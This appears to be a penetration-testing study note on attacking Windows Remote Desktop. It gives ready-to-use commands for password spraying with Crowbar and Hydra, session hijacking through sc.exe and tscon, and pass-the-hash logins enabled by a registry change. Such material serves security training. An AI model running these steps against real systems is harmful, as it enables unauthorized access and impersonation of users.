Attacking RDP
Let’s break down the Attacking RDP section you provided. Remote Desktop Protocol (RDP) is a Microsoft protocol that lets you remotely connect to a computer with a graphical interface over a network. It’s widely used by admins to manage systems centrally and by managed service providers (MSPs) to handle client networks. However, its popularity makes it a juicy target for attackers.
Step 1: Enumeration
RDP runs on TCP/3389 by default. We use Nmap to check if this port is open and an RDP service is active. If it’s open, we’ve got a potential entry point.
Common Attack: Password Guessing
RDP requires a username and password. Misconfigurations might leave it password-less (rare but possible). The go-to attack is password guessing, but Windows often locks accounts after too many failed attempts (Account Lockout).
To avoid this, we use Password Spraying: Try one password across multiple usernames, then switch passwords, staying under the lockout threshold.
Tools for Password Attacks:
Crowbar: Takes a list of usernames and one password, tests them against RDP, and flags any successful logins.
Hydra: Similar idea—tries a single password across many usernames to find valid credentials.
Once You Have Credentials:
Use tools like rdesktop or xfreerdp to log into the RDP server with the valid username and password, giving you a graphical interface to explore.
Advanced Attack: Session Hijacking
If you gain access to a machine with a local admin account and another user is logged in via RDP, you can hijack their session—impersonate them without their password.
How?
Use tscon.exe (a Microsoft tool) to switch to their session, but you need SYSTEM privileges.
If you only have admin rights, create a service with sc.exe that runs a command as SYSTEM, then hijack the session.
If the hijacked user is a Domain Admin, you’ve hit the jackpot—full network control.
Pass-the-Hash (PtH) Attack:
If you have a user’s NTLM hash (e.g., from a credential dump) but can’t crack it to a plaintext password, you can still use it to access RDP.
How?
The target needs Restricted Admin Mode enabled, which isn’t default. Enable it by tweaking the Registry (DisableRestrictedAdmin key).
Then, use xfreerdp with the hash to log in, gaining GUI access.
Note: This doesn’t work on all systems (e.g., Server 2019 patched it), but it’s worth a shot when GUI access is needed.
Steps:
Enumeration:
Port: TCP/3389.
Tool: Nmap to confirm RDP is running.
Password Attacks:
Method: Password Spraying (one password, many usernames).
Goal: Find valid credentials without triggering lockout.
Session Hijacking:
Requirement: Local admin + SYSTEM privileges.
Goal: Impersonate an active RDP user (e.g., Domain Admin).
Pass-the-Hash (PtH):
Requirement: NTLM hash + Restricted Admin Mode enabled.
Goal: RDP access without plaintext password.
Tools & Commands:
Tool/Command
What It Does
nmap -Pn -p3389 <IP>
Scans TCP/3389 to detect RDP service.
crowbar -b rdp -s <IP> -U <file> -c <pass>
Password sprays RDP with a username list and single password.
hydra -L <file> -p <pass> <IP> rdp
Same as Crowbar, tests one password across usernames.
rdesktop -u <user> -p <pass> <IP>
Logs into RDP with valid credentials.
query user
Lists active RDP sessions (ID, username, session name).
sc.exe create <name> binpath= "cmd.exe /k tscon <ID> /dest:<session>"
Creates a service to run tscon as SYSTEM for session hijacking.
tscon <ID> /dest:<session>
Switches to another RDP session (needs SYSTEM).
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin
Enables Restricted Admin Mode for PtH.
xfreerdp /v:<IP> /u:<user> /pth:<hash>
Logs into RDP using an NTLM hash.
Quick Tips:
Start with Nmap: Verify RDP is active.
Spray Smart: Avoid lockouts with Password Spraying.
Hijack Opportunity: Look for active sessions with query user.
PtH Check: Test if Restricted Admin Mode is on; if not, enable it.
Last updated